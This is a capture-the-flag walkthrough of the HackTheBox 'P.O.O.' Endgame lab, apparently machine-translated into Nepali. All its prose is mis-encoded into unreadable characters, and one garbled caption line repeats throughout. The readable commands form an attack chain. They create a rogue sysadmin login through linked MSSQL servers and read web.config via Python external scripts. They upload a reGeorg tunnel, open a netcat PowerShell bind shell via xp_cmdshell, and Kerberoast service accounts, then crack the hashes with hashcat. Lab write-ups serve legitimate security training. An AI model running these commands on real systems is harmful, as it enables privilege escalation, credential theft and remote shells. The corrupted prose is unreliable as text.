рддрд╕рд░реНрде, рдпреЛ DBO рд╕рдиреНрджрд░реНрдн рд╣реЛ рдЬрд╕рдорд╛ рд╕рдмреИ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░рд╣рд░реВ рд╣реБрдиреБрдкрд░реНрдЫред рд▓рд┐рдЩреНрдХ рдЧрд░рд┐рдПрдХреЛ рд╕рд░реНрднрд░рдмрд╛рдЯ рдЕрдиреБрд░реЛрдзрдХреЛ рдЕрд╡рд╕реНрдерд╛рдорд╛ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░рд╣рд░реВ рдЬрд╛рдБрдЪ рдЧрд░реМрдВред

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рддрдкрд╛рдИрд▓реЗ рджреЗрдЦреНрди рд╕рдХреНрдиреБрд╣реБрдиреНрдЫ, рд╣рд╛рдореАрд╕рдБрдЧ рд╕рдмреИ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░рд╣рд░реВ рдЫрдиреН! рдпрд╕рд░реА рдЖрдлреНрдиреЛ Admin рдмрдирд╛рдФрдВред рддрд░ рддрд┐рдиреАрд╣рд░реВрд▓реЗ рдпрд╕рд▓рд╛рдИ рдУрдкрдирдХреНрд╡реЗрд░реА рдорд╛рд░реНрдлрдд рдЕрдиреБрдорддрд┐ рджрд┐рдБрджреИрдирдиреН, рдпрд╕рд▓рд╛рдИ EXECUTE AT рдорд╛рд░реНрдлрдд рдЧрд░реМрдВред

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

рд░ рдЕрдм рд╣рд╛рдореА рдирдпрд╛рдБ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рдХреЛ рдкреНрд░рдорд╛рдгрд╣рд░реВрд╕рдБрдЧ рдЬрдбрд╛рди рдЧрд░реНрдЫреМрдВ, рдирдпрд╛рдБ рдлреНрд▓реНрдпрд╛рдЧ рдбрд╛рдЯрд╛рдмреЗрд╕ рдЕрд╡рд▓реЛрдХрди рдЧрд░реНрдиреБрд╣реЛрд╕реНред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд╣рд╛рдореА рдпреЛ рдЭрдгреНрдбрд╛ рд╣рд╕реНрддрд╛рдиреНрддрд░рдг рдЧрд░реНрдЫреМрдВ рд░ рдЕрдЧрд╛рдбрд┐ рдмрдвреНрдЫреМрдВред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдмреНрдпрд╛рдХрдЯреНрд░реНрдпрд╛рдХ рдЭрдгреНрдбрд╛

MSSQL рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдЧрд░реМрдВ, рдо рдЗрдореНрдкреНрдпрд╛рдХреЗрдЯ рдкреНрдпрд╛рдХреЗрдЬрдмрд╛рдЯ mssqlclient рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджреИрдЫреБред

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд╣рд╛рдореАрд▓реЗ рдкрд╛рд╕рд╡рд░реНрдбрд╣рд░реВ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди рдЖрд╡рд╢реНрдпрдХ рдЫ, рд░ рд╣рд╛рдореАрд▓реЗ рдкрд╣рд┐рд▓реЗ рдиреИ рднреЗрдЯреЗрдХрд╛ рдкрд╣рд┐рд▓реЛ рдХреБрд░рд╛ рд╕рд╛рдЗрдЯ рд╣реЛред рдпрд╕реИрд▓реЗ, рд╣рд╛рдореАрд▓рд╛рдИ рд╡реЗрдм рд╕рд░реНрднрд░ рдХрдиреНрдлрд┐рдЧрд░реЗрд╕рди рдЪрд╛рд╣рд┐рдиреНрдЫ (рдпреЛ рдПрдХ рд╕реБрд╡рд┐рдзрд╛рдЬрдирдХ рд╢реЗрд▓ рдлрд╛рд▓реНрди рдЕрд╕рдореНрднрд╡ рдЫ, рд╕реНрдкрд╖реНрдЯ рд░реВрдкрдорд╛ рдлрд╛рдпрд░рд╡рд╛рд▓рд▓реЗ рдХрд╛рдо рдЧрд░рд┐рд░рд╣реЗрдХреЛ рдЫ)ред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рддрд░ рдкрд╣реБрдБрдЪ рдЕрд╕реНрд╡реАрдХрд╛рд░ рдЧрд░рд┐рдПрдХреЛ рдЫред рдпрджреНрдпрдкрд┐ рд╣рд╛рдореА MSSQL рдмрд╛рдЯ рдлрд╛рдЗрд▓ рдкрдвреНрди рд╕рдХреНрдЫреМрдВ, рд╣рд╛рдореАрд▓реЗ рдХреЗрд╡рд▓ рдХреБрди рдкреНрд░реЛрдЧреНрд░рд╛рдорд┐рдЩ рднрд╛рд╖рд╛рд╣рд░реВ рдХрдиреНрдлрд┐рдЧрд░ рдЧрд░рд┐рдПрдХрд╛ рдЫрдиреН рднрдиреЗрд░ рдЬрд╛рдиреНрди рдЖрд╡рд╢реНрдпрдХ рдЫред рд░ MSSQL рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реАрдорд╛ рд╣рд╛рдореАрд▓реЗ рдкрддреНрддрд╛ рд▓рдЧрд╛рдпреМрдВ рдХрд┐ рддреНрдпрд╣рд╛рдБ рдкрд╛рдЗрдерди рдЫред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рддреНрдпрд╕рдкрдЫрд┐ web.config рдлрд╛рдЗрд▓ рдкрдвреНрди рдХреБрдиреИ рд╕рдорд╕реНрдпрд╛ рдЫреИрдиред

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдкреНрд░рдорд╛рдгрд╣рд░реВ рдлреЗрд▓рд╛ рдкрд░реЗрдХреЛ рд╕рд╛рде, / admin рдорд╛ рдЬрд╛рдиреБрд╣реЛрд╕реН рд░ рдЭрдгреНрдбрд╛ рдЙрдард╛рдЙрдиреБрд╣реЛрд╕реНред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдЦреБрдЯреНрдЯрд╛рдХреЛ рдЭрдгреНрдбрд╛

рд╡рд╛рд╕реНрддрд╡рдорд╛, рддреНрдпрд╣рд╛рдБ рдлрд╛рдпрд░рд╡рд╛рд▓ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджрд╛ рдХреЗрд╣реА рдЕрд╕реБрд╡рд┐рдзрд╛рд╣рд░реВ рдЫрдиреН, рддрд░ рдиреЗрдЯрд╡рд░реНрдХ рд╕реЗрдЯрд┐рдЩрд╣рд░реВ рд╣реЗрд░реНрджреИ, рд╣рд╛рдореАрд▓реЗ IPv6 рдкрдирд┐ рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рдПрдХреЛ рдЫ рднрдиреЗрд░ рдпрд╛рдж рдЧрд░реНрдЫреМрдВ!

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдпреЛ рдареЗрдЧрд╛рдирд╛ /etc/hosts рдорд╛ рдердкреМрдВред
dead:babe::1001 poo6.htb
рд╣реЛрд╕реНрдЯрд▓рд╛рдИ рдлреЗрд░рд┐ рд╕реНрдХреНрдпрд╛рди рдЧрд░реМрдВ, рддрд░ рдпрд╕ рдкрдЯрдХ IPv6 рдорд╛ред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд░ WinRM рд╕реЗрд╡рд╛ IPv6 рдорд╛ рдЙрдкрд▓рдмреНрдз рдЫред рднреЗрдЯрд┐рдПрдХрд╛ рдкреНрд░рдорд╛рдгрд╣рд░реВрд╕рдБрдЧ рдЬрдбрд╛рди рдЧрд░реМрдВред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдбреЗрд╕реНрдХрдЯрдкрдорд╛ рдЭрдгреНрдбрд╛ рдЫ, рд╣рд╛рдореА рдпрд╕рд▓рд╛рдИ рд╣рд╕реНрддрд╛рдиреНрддрд░рдг рдЧрд░реНрдЫреМрдВред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

P00ned рдЭрдгреНрдбрд╛

рд╕рдВрдЧ рд╣реЛрд╕реНрдЯ рдорд╛ рдЯреЛрд╣реА рдкрдЫрд┐ winpeas рд╣рд╛рдореАрд▓реЗ рд╡рд┐рд╢реЗрд╖ рдХреЗрд╣реА рдкрд╛рдЙрдБрджреИрдиреМрдВред рддреНрдпрд╕рдкрдЫрд┐ рдлреЗрд░рд┐ рдкреНрд░рдорд╛рдгрд╣рд░реВ рдЦреЛрдЬреНрдиреЗ рдирд┐рд░реНрдгрдп рдЧрд░рд┐рдпреЛ (рдореИрд▓реЗ рдкрдирд┐ рдпрд╕ рд╡рд┐рд╖рдпрдорд╛ рд▓реЗрдЦреЗрдХреЛ рдЫреБ рд▓реЗрдЦ)ред рддрд░ рдореИрд▓реЗ WinRM рдорд╛рд░реНрдлрдд рдкреНрд░рдгрд╛рд▓реАрдмрд╛рдЯ рд╕рдмреИ SPN рд╣рд░реВ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди рд╕рдХрд┐рдиред

setspn.exe -T intranet.poo -Q */*

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

MSSQL рдорд╛рд░реНрдлрдд рдЖрджреЗрд╢ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реМрдВред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдпреЛ рд╡рд┐рдзрд┐ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░, рд╣рд╛рдореАрд▓реЗ p00_hr рд░ p00_adm рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рд╣рд░реВрдХреЛ SPN рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрдЫреМрдВ, рдЬрд╕рдХреЛ рдорддрд▓рдм рддрд┐рдиреАрд╣рд░реВ Kerberoasting рдЬрд╕реНрддрд╛ рдЖрдХреНрд░рдордгрдХреЛ рд▓рд╛рдЧрд┐ рдЬреЛрдЦрд┐рдордорд╛ рдЫрдиреНред рдЫреЛрдЯрдХрд░реАрдорд╛, рд╣рд╛рдореА рддрд┐рдиреАрд╣рд░реВрдХреЛ рдкрд╛рд╕рд╡рд░реНрдб рд╣реНрдпрд╛рд╕рд╣рд░реВ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди рд╕рдХреНрдЫреМрдВред

рдкрд╣рд┐рд▓реЗ рддрдкрд╛рдИрдВрд▓реЗ MSSQL рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рдХреЛ рд░реВрдкрдорд╛ рд╕реНрдерд┐рд░ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди рдЖрд╡рд╢реНрдпрдХ рдЫред рддрд░ рд╣рд╛рдореА рдкрд╣реБрдБрдЪрдорд╛ рд╕реАрдорд┐рдд рднрдПрдХрд╛рд▓реЗ, рд╣рд╛рдореАрд╕рдБрдЧ рдкреЛрд░реНрдЯ 80 рд░ 1433 рдорд╛рд░реНрдлрдд рдорд╛рддреНрд░ рд╣реЛрд╕реНрдЯрд╕рдБрдЧ рд╕рдЮреНрдЪрд╛рд░ рдЫред рддрд░ рдкреЛрд░реНрдЯ 80 рдорд╛рд░реНрдлрдд рдЯреНрд░рд╛рдлрд┐рдХ рдЯрдиреЗрд▓ рдЧрд░реНрди рд╕рдореНрднрд╡ рдЫ! рдпрд╕рдХрд╛ рд▓рд╛рдЧрд┐ рд╣рд╛рдореА рдкреНрд░рдпреЛрдЧ рдЧрд░реНрдиреЗрдЫреМрдВ рдЕрд░реНрдХреЛ рдЖрд╡реЗрджрдиред рд╡реЗрдм рд╕рд░реНрднрд░рдХреЛ рдЧреГрд╣ рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реАрдорд╛ рдлрд╛рдЗрд▓ tunnel.aspx рдЕрдкрд▓реЛрдб рдЧрд░реМрдВ - C:inetpubwwwrootред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рддрд░ рдЬрдм рд╣рд╛рдореАрд▓реЗ рдпрд╕рд▓рд╛рдИ рдкрд╣реБрдБрдЪ рдЧрд░реНрдиреЗ рдкреНрд░рдпрд╛рд╕ рдЧрд░реНрдЫреМрдВ, рд╣рд╛рдореАрд▓реЗ 404 рддреНрд░реБрдЯрд┐ рдкрд╛рдЙрдБрдЫреМрдВред рдпрд╕рдХреЛ рдорддрд▓рдм рдпреЛ рд╣реЛ рдХрд┐ *.aspx рдлрд╛рдЗрд▓рд╣рд░реВ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рд╣реБрдБрджреИрдирдиреНред рдпреА рдПрдХреНрд╕рдЯреЗрдиреНрд╕рди рднрдПрдХрд╛ рдлрд╛рдЗрд▓рд╣рд░реВ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрдирдХреЛ рд▓рд╛рдЧрд┐, рдирд┐рдореНрдирд╛рдиреБрд╕рд╛рд░ ASP.NET 4.5 рд╕реНрдерд╛рдкрдирд╛ рдЧрд░реНрдиреБрд╣реЛрд╕реНред

dism /online /enable-feature /all /featurename:IIS-ASPNET45

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд░ рдЕрдм, tunnel.aspx рдкрд╣реБрдБрдЪ рдЧрд░реНрджрд╛, рд╣рд╛рдореАрд▓реЗ рдЬрд╡рд╛рдл рдкрд╛рдЙрдБрдЫреМрдВ рдХрд┐ рд╕рдмреИ рдЬрд╛рди рддрдпрд╛рд░ рдЫред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдЕрдиреБрдкреНрд░рдпреЛрдЧрдХреЛ рдЧреНрд░рд╛рд╣рдХ рднрд╛рдЧ рд╕реБрд░реБ рдЧрд░реМрдВ, рдЬрд╕рд▓реЗ рдЯреНрд░рд╛рдлрд┐рдХ рд░рд┐рд▓реЗ рдЧрд░реНрдиреЗрдЫред рд╣рд╛рдореА рдкреЛрд░реНрдЯ 5432 рдмрд╛рдЯ рд╕рдмреИ рдЯреНрд░рд╛рдлрд┐рдХ рд╕рд░реНрднрд░рдорд╛ рдлрд░реНрд╡рд╛рд░реНрдб рдЧрд░реНрдиреЗрдЫреМрдВред

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд░ рд╣рд╛рдореА рд╣рд╛рдореНрд░реЛ рдкреНрд░реЛрдХреНрд╕реА рдорд╛рд░реНрдлрдд рдХреБрдиреИ рдкрдирд┐ рдЕрдиреБрдкреНрд░рдпреЛрдЧрдХреЛ рдЯреНрд░рд╛рдлрд┐рдХ рдкрдард╛рдЙрди рдкреНрд░реЛрдХреНрд╕реАрдЪреЗрди рдкреНрд░рдпреЛрдЧ рдЧрд░реНрдЫреМрдВред рдпреЛ рдкреНрд░реЛрдХреНрд╕реАрд▓рд╛рдИ /etc/proxychains.conf рдХрдиреНрдлрд┐рдЧрд░реЗрд╕рди рдлрд╛рдЗрд▓рдорд╛ рдердкреМрдВред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдЕрдм рд╕рд░реНрднрд░рдорд╛ рдХрд╛рд░реНрдпрдХреНрд░рдо рдЕрдкрд▓реЛрдб рдЧрд░реМрдВ рдиреЗрдЯрдХреНрдпрд╛рдЯ, рдЬрд╕рдХреЛ рд╕рд╛рде рд╣рд╛рдореА рдПрдХ рд╕реНрдерд┐рд░ рдмрд╛рдБрдз рдЦреЛрд▓, рд░ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдмрдирд╛рдЙрдиреЗрдЫреМрдВ Kerberoast рдмреЛрд▓рд╛рдЙрдиреБрд╣реЛрд╕реН, рдЬрд╕рдХреЛ рд╕рд╛рде рд╣рд╛рдореА рдПрдХ Kerberoasting рдЖрдХреНрд░рдордг рдЧрд░реНрдиреЗрдЫреМрдВред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдЕрдм рд╣рд╛рдореА MSSQL рдорд╛рд░реНрдлрдд рд╢реНрд░реЛрддрд╛ рд╕реБрд░реБ рдЧрд░реНрдЫреМрдВред

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд░ рд╣рд╛рдореА рд╣рд╛рдореНрд░реЛ рдкреНрд░реЛрдХреНрд╕реА рдорд╛рд░реНрдлрдд рдЬрдбрд╛рди рдЧрд░реНрдЫреМрдВред

proxychains rlwrap nc poo.htb 4321

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рд░ рд╣реИрд╕ рдкреНрд░рд╛рдкреНрдд рдЧрд░реМрдВред

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

рдЕрд░реНрдХреЛ рддрдкрд╛рдИрдВрд▓реЗ рдпреА рд╣реНрдпрд╛рд╕рд╣рд░реВ рджреЛрд╣реЛрд░реНрдпрд╛рдЙрди рдЖрд╡рд╢реНрдпрдХ рдЫред rockyou рд╢рдмреНрджрдХреЛрд╢рд▓реЗ рдпреА рдкрд╛рд╕рд╡рд░реНрдбрд╣рд░реВ рд╕рдорд╛рд╡реЗрд╢ рдирдЧрд░реЗрдХреЛ рд╣реБрдирд╛рд▓реЗ, рдореИрд▓реЗ Seclists рдорд╛ рдкреНрд░рджрд╛рди рдЧрд░рд┐рдПрдХрд╛ рд╕рдмреИ рдкрд╛рд╕рд╡рд░реНрдб рд╢рдмреНрджрдХреЛрд╢рд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрдВред рдЦреЛрдЬ рдХреЛ рд▓рд╛рдЧреА рд╣рд╛рдореА hashcat рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджрдЫреМрдВред

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

рд░ рд╣рд╛рдореАрд▓реЗ рджреБрд╡реИ рдкрд╛рд╕рд╡рд░реНрдбрд╣рд░реВ рдлреЗрд▓рд╛ рдкрд╛рд░реНрдЫреМрдВ, рдкрд╣рд┐рд▓реЛ рдбрдЪ_passwordlist.txt рд╢рдмреНрджрдХреЛрд╢рдорд╛, рд░ рджреЛрд╕реНрд░реЛ Keyboard-Combinations.txt рдорд╛ред

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

HackTheBoxendgameред рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рд╡реНрдпрд╛рд╡рд╕рд╛рдпрд┐рдХ рдЖрдкрддреНрддрд┐рдЬрдирдХ рд╕рдВрдЪрд╛рд▓рди рдХреЛ рдкрд╛рд░рд┐рддред Pentest рд╕рдХреНрд░рд┐рдп рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛

